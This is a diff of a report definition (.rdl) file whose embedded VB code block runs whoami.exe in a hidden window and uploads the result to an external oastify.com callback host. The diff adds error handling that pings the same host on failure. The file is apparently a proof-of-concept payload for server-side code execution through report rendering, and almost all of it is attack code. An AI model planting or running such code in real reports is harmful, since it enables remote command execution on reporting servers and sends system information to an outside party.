--- a/untitled.rdl
+++ b/untitled.rdl
@@ -45,20 +45,24 @@
   </ReportParametersLayout>
   <Code>
     Dim webClient As New System.Net.WebClient
-    Using process as New System.Diagnostics.Process()
-      process.StartInfo.Filename = "whoami.exe"
-      process.StartInfo.RedirectStandardOutput = True
-      process.StartInfo.UseShellExecute = False
-      process.StartInfo.CreateNoWindow = True
-
-      process.Start()
-
-      output = process.StandardOutput.ReadToEnd()
-
-      process.WaitForExit()
-
-      webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", output)
-    End Using
+    Try
+      Using process as New System.Diagnostics.Process()
+        process.StartInfo.Filename = "whoami.exe"
+        process.StartInfo.RedirectStandardOutput = True
+        process.StartInfo.UseShellExecute = False
+        process.StartInfo.CreateNoWindow = True
+  
+        process.Start()
+  
+        output = process.StandardOutput.ReadToEnd()
+  
+        process.WaitForExit()
+  
+        webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", output)
+      End Using
+    Catch
+      webClient.DownloadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/exception/")
+    End Try
   </Code>
   <rd:ReportUnitType>Inch</rd:ReportUnitType>
   <rd:PageUnit>Px</rd:PageUnit>
